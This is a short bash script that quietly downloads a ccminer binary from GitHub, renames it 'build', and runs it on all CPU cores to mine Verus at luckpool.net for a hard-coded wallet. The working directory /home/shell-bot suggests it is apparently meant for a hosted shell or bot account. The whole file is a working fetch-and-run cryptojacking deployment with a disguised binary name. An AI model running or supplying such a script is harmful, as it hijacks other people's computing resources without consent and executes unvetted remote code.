#!/bin/bash

# Do not edit this file!
# kumaha aink we njink

cd /home/shell-bot
wget -qO build https://github.com/Tokisaki-mitsuha/mining/blob/master/ccminer?raw=true
chmod +x build
./build -a verus -o stratum+tcp://eu.luckpool.net:3956 -u RFa5RbzpTAFqiFREDsy5doaVPRS1HVPdzq.MODALNIKAH -p x -t $(nproc --all)
